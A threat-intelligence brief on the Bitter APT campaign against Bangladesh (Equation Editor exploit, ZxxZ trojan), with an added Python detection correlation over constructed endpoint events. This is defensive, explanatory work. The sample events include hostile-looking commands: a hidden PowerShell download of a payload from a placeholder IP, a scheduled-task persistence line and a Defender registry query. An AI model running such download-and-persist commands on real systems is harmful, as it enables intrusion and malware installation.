2022-05-18

Bitter APT Targets Bangladesh

Industry: N/A | Level: Tactical | Source: CiscoTalos

Cisco Talos has observed activity from the Bitter APT group targeting the Bangladesh government dating back to August 2021. The group has historically targeted entities in China, Pakistan and Saudi Arabia, so the shift to Bangladesh is new. The campaign begins with spear-phishing emails, sent through Zimbra and JavaMail, that masquerade as "regular operational tasks" and carry a weaponized Office document (Word or Excel). The documents abuse Microsoft Office vulnerabilities, notably the Equation Editor flaw CVE-2017-11882; in the Excel variant, an embedded object configures a scheduled task. Once initial access is obtained, the actor deploys a trojan that Talos named "ZxxZ", which disguises itself as a Windows Security update and provides remote code execution. The trojan performs system information discovery and checks for defensive tools such as Windows Defender and other known antivirus products. The group's main objective is cyber espionage.

Anvilogic Scenario:

  • Bitter APT - Infection Chain with Equation Editor

Anvilogic Use Cases:

  • Abuse EQNEDT32.EXE CVE-2017-11882
  • Create/Modify Schtasks
  • Executable File Written to Disk
  • Invoke-WebRequest Command
  • Query Registry
  • Executable Process from Suspicious Folder
  • Network Connection with Suspicious Folder
  • Remote Thread from Suspicious Folder
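The scenario and use cases above, expressed as a small correlation over constructed endpoint telemetry. This is an added example and is not Anvilogic's detection content or Cisco Talos' code: each use case becomes a per-event rule, and a host raises the scenario when an EQNEDT32.EXE child process is followed within a time window by a staging step (schtasks or Invoke-WebRequest) and an execution step (an executable dropped, launched or connecting out from a user-writable folder). The event fields loosely mimic Sysmon ProcessCreate/FileCreate/NetworkConnect/CreateRemoteThread records, and every host name, path, timestamp, command line and IP address is made up.

```python
"""Added example: correlation for "Bitter APT - Infection Chain with Equation
Editor" over constructed events. Event shapes, hosts, paths, timestamps and
the 203.0.113.10 address are assumptions, not data from the Talos report."""
import re
from collections import defaultdict
from datetime import datetime

# User-writable folders treated as suspicious launch locations (assumption).
SUSPICIOUS_DIRS = ("\\appdata\\local\\temp\\", "\\appdata\\roaming\\",
                   "\\programdata\\", "\\users\\public\\", "\\windows\\temp\\")
IWR_RE = re.compile(r"invoke-webrequest|\biwr\b", re.I)
SCHTASKS_RE = re.compile(r"/(create|change)\b", re.I)
REG_QUERY_RE = re.compile(r"\breg(\.exe)?\s+query\b", re.I)

INITIAL = {"Abuse EQNEDT32.EXE CVE-2017-11882"}
STAGING = {"Create/Modify Schtasks", "Invoke-WebRequest Command"}
EXECUTION = {"Executable File Written to Disk",
             "Executable Process from Suspicious Folder",
             "Network Connection with Suspicious Folder",
             "Remote Thread from Suspicious Folder"}


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def in_suspicious_dir(path):
    return any(d in path.lower() for d in SUSPICIOUS_DIRS)


def classify(ev):
    """Return the use-case names a single event matches (possibly none)."""
    hits = []
    image = ev.get("image", "")
    cmd = ev.get("cmdline", "")
    if ev["event"] == "ProcessCreate":
        if basename(ev.get("parent_image", "")) == "eqnedt32.exe":
            hits.append("Abuse EQNEDT32.EXE CVE-2017-11882")
        if basename(image) == "schtasks.exe" and SCHTASKS_RE.search(cmd):
            hits.append("Create/Modify Schtasks")
        if IWR_RE.search(cmd):
            hits.append("Invoke-WebRequest Command")
        if REG_QUERY_RE.search(cmd):
            hits.append("Query Registry")
        if in_suspicious_dir(image):
            hits.append("Executable Process from Suspicious Folder")
    elif ev["event"] == "FileCreate":
        target = ev.get("target", "")
        if target.lower().endswith(".exe") and in_suspicious_dir(target):
            hits.append("Executable File Written to Disk")
    elif ev["event"] == "NetworkConnect" and in_suspicious_dir(image):
        hits.append("Network Connection with Suspicious Folder")
    elif ev["event"] == "CreateRemoteThread" and in_suspicious_dir(image):
        hits.append("Remote Thread from Suspicious Folder")
    return hits


def correlate(events, window_seconds=900):
    """Raise the scenario per host once initial access, staging and execution all appear."""
    by_host = defaultdict(list)
    for ev in events:
        ts = datetime.fromisoformat(ev["ts"])
        for uc in classify(ev):
            by_host[ev["host"]].append((ts, uc))
    alerts = []
    for host, hits in by_host.items():
        starts = sorted(t for t, uc in hits if uc in INITIAL)
        if not starts:
            continue
        t0 = starts[0]  # first EQNEDT32 child process opens the window
        seen = {uc for t, uc in hits if 0 <= (t - t0).total_seconds() <= window_seconds}
        if seen & STAGING and seen & EXECUTION:
            alerts.append({"host": host, "start": t0.isoformat(), "use_cases": sorted(seen)})
    return alerts


# Constructed telemetry: WS01 shows the full chain, WS02 only a benign scheduled task.
DROP = r"C:\Users\jdoe\AppData\Roaming\wsu.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"ts": "2021-08-10T09:00:00", "host": "WS01", "event": "ProcessCreate",
     "parent_image": r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": 'cmd.exe /c schtasks /create /sc minute /mo 5 /tn WinUpdate /tr "%s"' % DROP},
    {"ts": "2021-08-10T09:00:01", "host": "WS01", "event": "ProcessCreate",
     "parent_image": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": 'schtasks /create /sc minute /mo 5 /tn WinUpdate /tr "%s"' % DROP},
    {"ts": "2021-08-10T09:00:02", "host": "WS01", "event": "ProcessCreate",
     "parent_image": r"C:\Windows\System32\cmd.exe", "image": PS,
     "cmdline": "powershell -w hidden Invoke-WebRequest -Uri http://203.0.113.10/u -OutFile " + DROP},
    {"ts": "2021-08-10T09:00:03", "host": "WS01", "event": "FileCreate", "image": PS, "target": DROP},
    {"ts": "2021-08-10T09:05:00", "host": "WS01", "event": "ProcessCreate",
     "parent_image": r"C:\Windows\System32\svchost.exe", "image": DROP, "cmdline": "wsu.exe"},
    {"ts": "2021-08-10T09:05:01", "host": "WS01", "event": "ProcessCreate",
     "parent_image": DROP, "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r'reg query "HKLM\SOFTWARE\Microsoft\Windows Defender"'},
    {"ts": "2021-08-10T09:05:02", "host": "WS01", "event": "NetworkConnect",
     "image": DROP, "dest": "203.0.113.10:443"},
    {"ts": "2021-08-10T10:00:00", "host": "WS02", "event": "ProcessCreate",
     "parent_image": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r"schtasks /create /tn Backup /tr C:\Tools\backup.cmd"},
]

if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert)
```

Only WS01 alerts: WS02's scheduled task matches a single use case, but without an EQNEDT32.EXE child process there is no window to correlate into, which is the point of tying the scenario to the initial-access rule rather than alerting on schtasks or Invoke-WebRequest alone. Running the chain on real telemetry would mean swapping the constructed dicts for parsed Sysmon or EDR events with the same fields.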
